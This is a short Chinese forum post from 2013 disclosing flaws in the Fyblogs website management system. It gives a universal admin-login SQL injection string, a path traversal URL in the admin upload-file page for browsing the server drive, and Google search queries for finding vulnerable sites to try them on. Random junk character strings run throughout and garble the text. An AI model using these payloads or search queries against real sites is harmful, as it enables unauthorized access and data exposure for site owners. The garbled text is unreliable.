漏洞类型: 未授权访问/权限绕过
9 O. G* z' I/ x0 e
6 C$ C4 e! R7 `! ]9 e简要描述:0 @* O1 F9 V$ n1 M
! a. o1 g' W$ t9 ^% Z+ x
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!) ?* d9 [$ Y) {# e, s. b
6 ~# ~2 [- R5 x- q& }详细说明:
5 z& \: W6 n3 W8 ]+ I$ |% C8 O6 k5 U2 w3 [) c- k
后台万能密码 'or'='or'$ V. z3 S( @+ j* q
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!1 b5 s5 S ^- P! i$ W3 Q8 l% h
admin/uploadfile.asp?currentFolder=/upfiles/../
4 B- A7 M. o2 N5 u9 j: w( d0 K a) {0 ?: F
漏洞证明:: f- |: A' e5 O- m8 D+ q
! `: x$ I) I7 ^! E8 v谷歌:inurl:type.asp?id=1 新闻中心
}+ f7 L. o( l1 x或者 :inurl:download_ok.asp?' M" A" Y9 u5 n
! x( ]% C- h' B, r& o% U* P
可以测试
2 T. u3 p: A$ p5 S |* [4 } t/ {7 N
) I @% L1 P7 `- L K3 ?
|
发表于 2013-3-7 13:07:46
收藏
支持
反对